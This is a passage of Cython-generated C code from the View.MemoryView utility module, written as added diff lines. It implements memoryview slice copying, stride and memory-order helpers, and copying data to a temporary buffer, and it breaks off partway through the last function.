PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_memviewslice) { + PyObject *(*__pyx_v_to_object_func)(char *); + int (*__pyx_v_to_dtype_func)(char *, PyObject *); + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *(*__pyx_t_2)(char *); + int (*__pyx_t_3)(char *, PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_copy_from_slice", 0); + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":1095 + * + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func # <<<<<<<<<<<<<< + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + */ + __pyx_t_2 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_object_func; + __pyx_v_to_object_func = __pyx_t_2; + + /* "View.MemoryView":1096 + * if isinstance(memview, _memoryviewslice): + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func # <<<<<<<<<<<<<< + * else: + * to_object_func = NULL + */ + __pyx_t_3 = ((struct __pyx_memoryviewslice_obj *)__pyx_v_memview)->to_dtype_func; + __pyx_v_to_dtype_func = __pyx_t_3; + + /* "View.MemoryView":1094 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * to_object_func = (<_memoryviewslice> memview).to_object_func + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1098 + * to_dtype_func = (<_memoryviewslice> memview).to_dtype_func + * else: + * to_object_func = NULL # <<<<<<<<<<<<<< + * to_dtype_func = NULL + * + */ + /*else*/ { + __pyx_v_to_object_func = NULL; + + /* "View.MemoryView":1099 + * else: + * to_object_func = NULL + * to_dtype_func = NULL # <<<<<<<<<<<<<< + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + */ + __pyx_v_to_dtype_func = NULL; + } + __pyx_L3:; + + /* "View.MemoryView":1101 + * to_dtype_func = NULL + * + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, # <<<<<<<<<<<<<< + * to_object_func, to_dtype_func, + * memview.dtype_is_object) + */ + __Pyx_XDECREF(__pyx_r); + + /* "View.MemoryView":1103 + * return memoryview_fromslice(memviewslice[0], memview.view.ndim, + * to_object_func, to_dtype_func, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_memoryview_fromslice((__pyx_v_memviewslice[0]), __pyx_v_memview->view.ndim, __pyx_v_to_object_func, __pyx_v_to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_r = __pyx_t_4; + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "View.MemoryView":1087 + * + * @cname('__pyx_memoryview_copy_object_from_slice') + * cdef memoryview_copy_from_slice(memoryview memview, __Pyx_memviewslice *memviewslice): # <<<<<<<<<<<<<< + * """ + * Create a new memoryview object from a given memoryview object and slice. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview_copy_from_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + +static Py_ssize_t abs_py_ssize_t(Py_ssize_t __pyx_v_arg) { + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + + /* "View.MemoryView":1110 + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: + * return -arg if arg < 0 else arg # <<<<<<<<<<<<<< + * + * @cname('__pyx_get_best_slice_order') + */ + if ((__pyx_v_arg < 0)) { + __pyx_t_1 = (-__pyx_v_arg); + } else { + __pyx_t_1 = __pyx_v_arg; + } + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":1109 + * + * + * cdef Py_ssize_t abs_py_ssize_t(Py_ssize_t arg) noexcept nogil: # <<<<<<<<<<<<<< + * return -arg if arg < 0 else arg + * + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + +static char __pyx_get_best_slice_order(__Pyx_memviewslice *__pyx_v_mslice, int __pyx_v_ndim) { + int __pyx_v_i; + Py_ssize_t __pyx_v_c_stride; + Py_ssize_t __pyx_v_f_stride; + char __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1118 + * """ + * cdef int i + * cdef Py_ssize_t c_stride = 0 # <<<<<<<<<<<<<< + * cdef Py_ssize_t f_stride = 0 + * + */ + __pyx_v_c_stride = 0; + + /* "View.MemoryView":1119 + * cdef int i + * cdef Py_ssize_t c_stride = 0 + * cdef Py_ssize_t f_stride = 0 # <<<<<<<<<<<<<< + * + * for i in range(ndim - 1, -1, -1): + */ + __pyx_v_f_stride = 0; + + /* "View.MemoryView":1121 + * cdef Py_ssize_t f_stride = 0 + * + * for i in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + */ + for (__pyx_t_1 = (__pyx_v_ndim - 1); __pyx_t_1 > -1; __pyx_t_1-=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1123 + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_c_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1124 + * if mslice.shape[i] > 1: + * c_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * for i in range(ndim): + */ + goto __pyx_L4_break; + + /* "View.MemoryView":1122 + * + * for i in range(ndim - 1, -1, -1): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * c_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L4_break:; + + /* "View.MemoryView":1126 + * break + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + */ + __pyx_t_1 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_1; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + __pyx_t_2 = ((__pyx_v_mslice->shape[__pyx_v_i]) > 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1128 + * for i in range(ndim): + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_f_stride = (__pyx_v_mslice->strides[__pyx_v_i]); + + /* "View.MemoryView":1129 + * if mslice.shape[i] > 1: + * f_stride = mslice.strides[i] + * break # <<<<<<<<<<<<<< + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + */ + goto __pyx_L7_break; + + /* "View.MemoryView":1127 + * + * for i in range(ndim): + * if mslice.shape[i] > 1: # <<<<<<<<<<<<<< + * f_stride = mslice.strides[i] + * break + */ + } + } + __pyx_L7_break:; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + __pyx_t_2 = (abs_py_ssize_t(__pyx_v_c_stride) <= abs_py_ssize_t(__pyx_v_f_stride)); + if (__pyx_t_2) { + + /* "View.MemoryView":1132 + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): + * return 'C' # <<<<<<<<<<<<<< + * else: + * return 'F' + */ + __pyx_r = 'C'; + goto __pyx_L0; + + /* "View.MemoryView":1131 + * break + * + * if abs_py_ssize_t(c_stride) <= abs_py_ssize_t(f_stride): # <<<<<<<<<<<<<< + * return 'C' + * else: + */ + } + + /* "View.MemoryView":1134 + * return 'C' + * else: + * return 'F' # <<<<<<<<<<<<<< + * + * @cython.cdivision(True) + */ + /*else*/ { + __pyx_r = 'F'; + goto __pyx_L0; + } + + /* "View.MemoryView":1113 + * + * @cname('__pyx_get_best_slice_order') + * cdef char get_best_order(__Pyx_memviewslice *mslice, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * """ + * Figure out the best memory access order for a given slice. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + +static void _copy_strided_to_strided(char *__pyx_v_src_data, Py_ssize_t *__pyx_v_src_strides, char *__pyx_v_dst_data, Py_ssize_t *__pyx_v_dst_strides, Py_ssize_t *__pyx_v_src_shape, Py_ssize_t *__pyx_v_dst_shape, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + CYTHON_UNUSED Py_ssize_t __pyx_v_i; + CYTHON_UNUSED Py_ssize_t __pyx_v_src_extent; + Py_ssize_t __pyx_v_dst_extent; + Py_ssize_t __pyx_v_src_stride; + Py_ssize_t __pyx_v_dst_stride; + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + + /* "View.MemoryView":1144 + * + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + */ + __pyx_v_src_extent = (__pyx_v_src_shape[0]); + + /* "View.MemoryView":1145 + * cdef Py_ssize_t i + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] + */ + __pyx_v_dst_extent = (__pyx_v_dst_shape[0]); + + /* "View.MemoryView":1146 + * cdef Py_ssize_t src_extent = src_shape[0] + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] # <<<<<<<<<<<<<< + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + */ + __pyx_v_src_stride = (__pyx_v_src_strides[0]); + + /* "View.MemoryView":1147 + * cdef Py_ssize_t dst_extent = dst_shape[0] + * cdef Py_ssize_t src_stride = src_strides[0] + * cdef Py_ssize_t dst_stride = dst_strides[0] # <<<<<<<<<<<<<< + * + * if ndim == 1: + */ + __pyx_v_dst_stride = (__pyx_v_dst_strides[0]); + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + __pyx_t_1 = (__pyx_v_ndim == 1); + if (__pyx_t_1) { + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + __pyx_t_2 = (__pyx_v_src_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_dst_stride > 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L5_bool_binop_done; + } + + /* "View.MemoryView":1151 + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + */ + __pyx_t_2 = (((size_t)__pyx_v_src_stride) == __pyx_v_itemsize); + if (__pyx_t_2) { + __pyx_t_2 = (__pyx_v_itemsize == ((size_t)__pyx_v_dst_stride)); + } + __pyx_t_1 = __pyx_t_2; + __pyx_L5_bool_binop_done:; + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + if (__pyx_t_1) { + + /* "View.MemoryView":1152 + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, (__pyx_v_itemsize * __pyx_v_dst_extent))); + + /* "View.MemoryView":1150 + * + * if ndim == 1: + * if (src_stride > 0 and dst_stride > 0 and # <<<<<<<<<<<<<< + * src_stride == itemsize == dst_stride): + * memcpy(dst_data, src_data, itemsize * dst_extent) + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1154 + * memcpy(dst_data, src_data, itemsize * dst_extent) + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1155 + * else: + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) # <<<<<<<<<<<<<< + * src_data += src_stride + * dst_data += dst_stride + */ + (void)(memcpy(__pyx_v_dst_data, __pyx_v_src_data, __pyx_v_itemsize)); + + /* "View.MemoryView":1156 + * for i in range(dst_extent): + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * else: + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1157 + * memcpy(dst_data, src_data, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * else: + * for i in range(dst_extent): + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L4:; + + /* "View.MemoryView":1149 + * cdef Py_ssize_t dst_stride = dst_strides[0] + * + * if ndim == 1: # <<<<<<<<<<<<<< + * if (src_stride > 0 and dst_stride > 0 and + * src_stride == itemsize == dst_stride): + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1159 + * dst_data += dst_stride + * else: + * for i in range(dst_extent): # <<<<<<<<<<<<<< + * _copy_strided_to_strided(src_data, src_strides + 1, + * dst_data, dst_strides + 1, + */ + /*else*/ { + __pyx_t_3 = __pyx_v_dst_extent; + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_5 = 0; __pyx_t_5 < __pyx_t_4; __pyx_t_5+=1) { + __pyx_v_i = __pyx_t_5; + + /* "View.MemoryView":1160 + * else: + * for i in range(dst_extent): + * _copy_strided_to_strided(src_data, src_strides + 1, # <<<<<<<<<<<<<< + * dst_data, dst_strides + 1, + * src_shape + 1, dst_shape + 1, + */ + _copy_strided_to_strided(__pyx_v_src_data, (__pyx_v_src_strides + 1), __pyx_v_dst_data, (__pyx_v_dst_strides + 1), (__pyx_v_src_shape + 1), (__pyx_v_dst_shape + 1), (__pyx_v_ndim - 1), __pyx_v_itemsize); + + /* "View.MemoryView":1164 + * src_shape + 1, dst_shape + 1, + * ndim - 1, itemsize) + * src_data += src_stride # <<<<<<<<<<<<<< + * dst_data += dst_stride + * + */ + __pyx_v_src_data = (__pyx_v_src_data + __pyx_v_src_stride); + + /* "View.MemoryView":1165 + * ndim - 1, itemsize) + * src_data += src_stride + * dst_data += dst_stride # <<<<<<<<<<<<<< + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, + */ + __pyx_v_dst_data = (__pyx_v_dst_data + __pyx_v_dst_stride); + } + } + __pyx_L3:; + + /* "View.MemoryView":1137 + * + * @cython.cdivision(True) + * cdef void _copy_strided_to_strided(char *src_data, Py_ssize_t *src_strides, # <<<<<<<<<<<<<< + * char *dst_data, Py_ssize_t *dst_strides, + * Py_ssize_t *src_shape, Py_ssize_t *dst_shape, + */ + + /* function exit code */ +} + +/* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + +static void copy_strided_to_strided(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_dst, int __pyx_v_ndim, size_t __pyx_v_itemsize) { + + /* "View.MemoryView":1170 + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + * _copy_strided_to_strided(src.data, src.strides, dst.data, dst.strides, # <<<<<<<<<<<<<< + * src.shape, dst.shape, ndim, itemsize) + * + */ + _copy_strided_to_strided(__pyx_v_src->data, __pyx_v_src->strides, __pyx_v_dst->data, __pyx_v_dst->strides, __pyx_v_src->shape, __pyx_v_dst->shape, __pyx_v_ndim, __pyx_v_itemsize); + + /* "View.MemoryView":1167 + * dst_data += dst_stride + * + * cdef void copy_strided_to_strided(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * int ndim, size_t itemsize) noexcept nogil: + */ + + /* function exit code */ +} + +/* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *__pyx_v_src, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_size; + Py_ssize_t __pyx_r; + Py_ssize_t __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + + /* "View.MemoryView":1176 + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize # <<<<<<<<<<<<<< + * + * for shape in src.shape[:ndim]: + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_size = __pyx_t_1; + + /* "View.MemoryView":1178 + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + * + * for shape in src.shape[:ndim]: # <<<<<<<<<<<<<< + * size *= shape + * + */ + __pyx_t_3 = (__pyx_v_src->shape + __pyx_v_ndim); + for (__pyx_t_4 = __pyx_v_src->shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_v_shape = (__pyx_t_2[0]); + + /* "View.MemoryView":1179 + * + * for shape in src.shape[:ndim]: + * size *= shape # <<<<<<<<<<<<<< + * + * return size + */ + __pyx_v_size = (__pyx_v_size * __pyx_v_shape); + } + + /* "View.MemoryView":1181 + * size *= shape + * + * return size # <<<<<<<<<<<<<< + * + * @cname('__pyx_fill_contig_strides_array') + */ + __pyx_r = __pyx_v_size; + goto __pyx_L0; + + /* "View.MemoryView":1174 + * + * @cname('__pyx_memoryview_slice_get_size') + * cdef Py_ssize_t slice_get_size(__Pyx_memviewslice *src, int ndim) noexcept nogil: # <<<<<<<<<<<<<< + * "Return the size of the memory occupied by the slice in number of bytes" + * cdef Py_ssize_t shape, size = src.memview.view.itemsize + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *__pyx_v_shape, Py_ssize_t *__pyx_v_strides, Py_ssize_t __pyx_v_stride, int __pyx_v_ndim, char __pyx_v_order) { + int __pyx_v_idx; + Py_ssize_t __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + __pyx_t_1 = (__pyx_v_order == 'F'); + if (__pyx_t_1) { + + /* "View.MemoryView":1194 + * + * if order == 'F': + * for idx in range(ndim): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + __pyx_t_2 = __pyx_v_ndim; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_idx = __pyx_t_4; + + /* "View.MemoryView":1195 + * if order == 'F': + * for idx in range(ndim): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * else: + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1196 + * for idx in range(ndim): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * else: + * for idx in range(ndim - 1, -1, -1): + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + + /* "View.MemoryView":1193 + * cdef int idx + * + * if order == 'F': # <<<<<<<<<<<<<< + * for idx in range(ndim): + * strides[idx] = stride + */ + goto __pyx_L3; + } + + /* "View.MemoryView":1198 + * stride *= shape[idx] + * else: + * for idx in range(ndim - 1, -1, -1): # <<<<<<<<<<<<<< + * strides[idx] = stride + * stride *= shape[idx] + */ + /*else*/ { + for (__pyx_t_2 = (__pyx_v_ndim - 1); __pyx_t_2 > -1; __pyx_t_2-=1) { + __pyx_v_idx = __pyx_t_2; + + /* "View.MemoryView":1199 + * else: + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride # <<<<<<<<<<<<<< + * stride *= shape[idx] + * + */ + (__pyx_v_strides[__pyx_v_idx]) = __pyx_v_stride; + + /* "View.MemoryView":1200 + * for idx in range(ndim - 1, -1, -1): + * strides[idx] = stride + * stride *= shape[idx] # <<<<<<<<<<<<<< + * + * return stride + */ + __pyx_v_stride = (__pyx_v_stride * (__pyx_v_shape[__pyx_v_idx])); + } + } + __pyx_L3:; + + /* "View.MemoryView":1202 + * stride *= shape[idx] + * + * return stride # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_copy_data_to_temp') + */ + __pyx_r = __pyx_v_stride; + goto __pyx_L0; + + /* "View.MemoryView":1184 + * + * @cname('__pyx_fill_contig_strides_array') + * cdef Py_ssize_t fill_contig_strides_array( # <<<<<<<<<<<<<< + * Py_ssize_t *shape, Py_ssize_t *strides, Py_ssize_t stride, + * int ndim, char order) noexcept nogil: + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":1205 + * + * @cname('__pyx_memoryview_copy_data_to_temp') + * cdef void *copy_data_to_temp(__Pyx_memviewslice *src, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *tmpslice, + * char order, + */ + +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *__pyx_v_src, __Pyx_memviewslice *__pyx_v_tmpslice, char __pyx_v_order, int __pyx_v_ndim) { + int __pyx_v_i; + void *__pyx_v_result; + size_t __pyx_v_itemsize; + size_t __pyx_v_size; + void *__pyx_r; + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + struct __pyx_memoryview_obj *__pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":1216 + * cdef void *result + * + * cdef size_t itemsize = src.memview.view.itemsize # <<<<<<<<<<<<<< + * cdef size_t size = slice_get_size(src, ndim) + * + */ + __pyx_t_1 = __pyx_v_src->memview->view.itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":1217 + * + * cdef size_t itemsize = src.memview.view.itemsize + * cdef size_t size = slice_get_size(src, ndim) # <<<<<<<<<<<<<< + * + * result = malloc(size) + */ + __pyx_v_size = __pyx_memoryview_slice_get_size(__pyx_v_src, __pyx_v_ndim); + + /* "View.MemoryView":1219 + * cdef size_t size = slice_get_size(src, ndim) + * + * result = malloc(size) # <<<<<<<<<<<<<< + * if not result: + * _err_no_memory() + */ + __pyx_v_result = malloc(__pyx_v_size); + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + __pyx_t_2 = (!(__pyx_v_result != 0)); + if (__pyx_t_2) { + + /* "View.MemoryView":1221 + * result = malloc(size) + * if not result: + * _err_no_memory() # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_3 = __pyx_memoryview_err_no_memory(); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 1221, __pyx_L1_error) + + /* "View.MemoryView":1220 + * + * result = malloc(size) + * if not result: # <<<<<<<<<<<<<< + * _err_no_memory() + * + */ + } + + /* "View.MemoryView":1224 + * + * + * tmpslice.data = result # <<<<<<<<<<<<<< + * tmpslice.memview = src.memview + * for i in range(ndim): + */ + __pyx_v_tmpslice->data = ((char *)__pyx_v_result); + + /* "View.MemoryView":1225 + * + * tmpslice.data = result + * tmpslice.memview = src.memview # <<<<<<<<<<<<<< + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + */ + __pyx_t_4 = __pyx_v_src->memview; + __pyx_v_tmpslice->memview = __pyx_t_4; + + /* "View.MemoryView":1226 + * tmpslice.data = result + * tmpslice.memview = src.memview + * for i in range(ndim): # <<<<<<<<<<<<<< + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1227 + * tmpslice.memview = src.memview + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] # <<<<<<<<<<<<<< + * tmpslice.suboffsets[i] = -1 + * + */ + (__pyx_v_tmpslice->shape[__pyx_v_i]) = (__pyx_v_src->shape[__pyx_v_i]); + + /* "View.MemoryView":1228 + * for i in range(ndim): + * tmpslice.shape[i] = src.shape[i] + * tmpslice.suboffsets[i] = -1 # <<<<<<<<<<<<<< + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) + */ + (__pyx_v_tmpslice->suboffsets[__pyx_v_i]) = -1L; + } + + /* "View.MemoryView":1230 + * tmpslice.suboffsets[i] = -1 + * + * fill_contig_strides_array(&tmpslice.shape[0], &tmpslice.strides[0], itemsize, ndim, order) # <<<<<<<<<<<<<< + * + * + */ + (void)(__pyx_fill_contig_strides_array((&(__pyx_v_tmpslice->shape[0])), (&(__pyx_v_tmpslice->strides[0])), __pyx_v_itemsize, __pyx_v_ndim, __pyx_v_order)); + + /* "View.MemoryView":1233 + * + * + * for i in range(ndim): # <<<<<<<<<<<<<< + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 + */ + __pyx_t_3 = __pyx_v_ndim; + __pyx_t_5 = __pyx_t_3; + for (__pyx_t_6 = 0; __pyx_t_6 < __pyx_t_5; __pyx_t_6+=1) { + __pyx_v_i = __pyx_t_6; + + /* "View.MemoryView":1234 + * + * for i in range(ndim): + * if tmpslice.shape[i] == 1: # <<<<<<<<<<<<<< + * tmpslice.strides[i] = 0 + * + */ + __pyx_t_2 = ((__pyx_v_tmpslice->shape[__pyx_v_i]) == 1); + if (__pyx_t_2) { + + /* "View.MemoryView":1235 + * for i in range(ndim): + * if tmpslice.shape[i] == 1: + * tmpslice.strides[i] = 0 # <<<<<<<<<<<<<< + * + * if slice_is_contig(src[0], 